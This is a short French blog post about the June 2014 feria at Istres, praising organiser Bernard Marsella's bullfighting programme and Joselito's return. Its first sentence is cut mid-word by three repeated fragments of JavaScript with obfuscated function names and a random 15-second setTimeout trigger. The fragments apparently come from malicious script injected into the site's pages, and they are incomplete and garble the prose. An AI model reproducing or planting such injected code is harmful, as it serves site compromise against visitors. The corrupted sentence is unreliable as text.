ISTRISSIMO

Après les succés des éditions précédentes, on se demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andait ce que pouvait imaginer encore Bernard Marsella pour surprendre son monde à la feria d'Istres. Une fois encore, face à une salle archicomble, Bernard Marsella a frappé fort. Encore plus fort que les années précédentes. Cela paraissait impossible et pourtant le responsable des arènes provençales l'a fait. Programmer Morante de la Puebla à deux reprises constituait déjà un geste fort. Présenter Enrique Ponce aussi. Mais, l'évènement de cette feria qui, années après années, ne cesse de surprendre est bien évidemment le retour de Joselito qui avec Morante de la Publa, donnera l'alternative au jeune bittérois Cayetano Ortiz. Incroyable mais vrai. Pas de doute, les arènes du Palio à Istres afficheront complets pendant trois jours. Les hôtels et restaurants de la ville également. Bernard Marsella a placé Istres au centre du monde taurin à la mi-juin 2014.

Les commentaires sont fermés.